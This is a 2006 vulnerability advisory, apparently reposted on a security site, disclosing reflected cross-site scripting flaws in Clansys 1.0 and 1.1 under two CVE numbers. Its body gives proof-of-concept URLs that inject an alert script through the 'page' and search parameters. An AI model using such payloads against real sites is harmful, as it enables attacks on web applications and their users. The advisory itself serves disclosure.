Clansys Multiple Xss Vulnerabilities

Published
Credit
Risk
2006.05.16
Soot -Shabgard Security Team
Low
CWE
CVE
Local
Remote
N/A
CVE-2006-2368
CVE-2006-2367
No
Yes

---------------------------------------------
Clansys v.1.1 Multiple Xss Vulnerabilities
---------------------------------------------

Bug:
Clansys v.1.0
1- http://victim/path/index.php?page=archiv&func=search
"><script>alert(/Soot/)</script>

Clansys v.1.1
1- http://victim/path/index.php?page="><script>alert(/Soot/)</script>

2- http://victim/path/index.php?page=archiv&func=search
"><script>alert(/Soot/)</script>

---------------------------------------------
Source :
http://soot.shabgard.org/bugs/Clansys.txt

Credit :
Soot
Shabgard Security Team
http://www.shabgard.org

Greetz :
Hregy,Elite,Bl2k,Littlehacker
---------------------------------------------


See this note in RAW Version

 
Bugtraq RSS
Bugtraq
 
CVE RSS
CVEMAP
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn


Copyright 2016, cxsecurity.com